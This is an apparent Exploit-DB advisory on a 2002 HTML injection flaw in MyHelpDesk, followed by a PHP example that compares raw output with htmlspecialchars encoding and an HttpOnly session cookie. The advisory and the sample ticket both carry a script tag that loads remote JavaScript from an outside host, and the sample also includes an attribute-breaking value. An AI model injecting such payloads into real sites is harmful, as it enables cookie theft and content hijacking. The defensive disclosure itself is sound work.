MyHelpDesk 20020509 - HTML Injection

EDB-ID: 21519
Platform: PHP
Date: 2002-06-10


source: https://www.securityfocus.com/bid/4967/info

It has been reported that MyHelpDesk is vulnerable to HTML injection attacks.

MyHelpDesk does not properly sanitize HTML tags from form fields. Attackers may pass arbitrary HTML and script code through the unsanitized form fields or through parameters specified via URL. The attacker-supplied HTML code will be executed by the web client of users who visit such pages, in the security context of the site running the vulnerable software.

This may potentially be exploited to hijack web content or steal cookie-based authentication credentials from legitimate users.

<script src="http://forum.olympos.org/f.js">Alper</script>
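
The flaw described above and its fix, as an added example that is not MyHelpDesk's own code (the application's source is not shown on this page): a ticket view that echoes form fields raw, beside one that encodes them at output time. The function names, the ticket array layout and the email value are assumptions constructed for illustration; the subject value is the string quoted above. The array form of session_set_cookie_params needs PHP 7.3 or later.

```php
<?php
declare(strict_types=1);

// Defence in depth for the cookie-theft impact: an HttpOnly session cookie
// cannot be read by injected script. Must be set before any output.
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);

/** Encode untrusted text for an HTML element body or a quoted attribute. */
function h(string $value): string
{
    // ENT_QUOTES also encodes ' and ", so a value cannot close an attribute.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Hypothetical vulnerable view: fields reach the markup unmodified. */
function render_ticket_unsafe(array $ticket): string
{
    return '<h2>' . $ticket['subject'] . '</h2>'
         . '<input name="email" value="' . $ticket['email'] . '">';
}

/** Hardened view: every field is encoded where it is written out. */
function render_ticket_safe(array $ticket): string
{
    return '<h2>' . h($ticket['subject']) . '</h2>'
         . '<input name="email" value="' . h($ticket['email']) . '">';
}

// Constructed sample ticket. In the application these values would arrive
// from a form field or a URL parameter.
$ticket = [
    'subject' => '<script src="http://forum.olympos.org/f.js">Alper</script>',
    'email'   => '"><b>x</b>', // constructed: tries to close the attribute
];

$unsafe = render_ticket_unsafe($ticket);
$safe   = render_ticket_safe($ticket);

// The unsafe view contains a live <script> element; the safe view does not.
var_dump(strpos($unsafe, '<script') !== false);
var_dump(strpos($safe, '<script') === false);

echo $safe, "\n";
```

Encoding at output time, rather than stripping tags on input, also covers values that entered the data store before the fix was deployed.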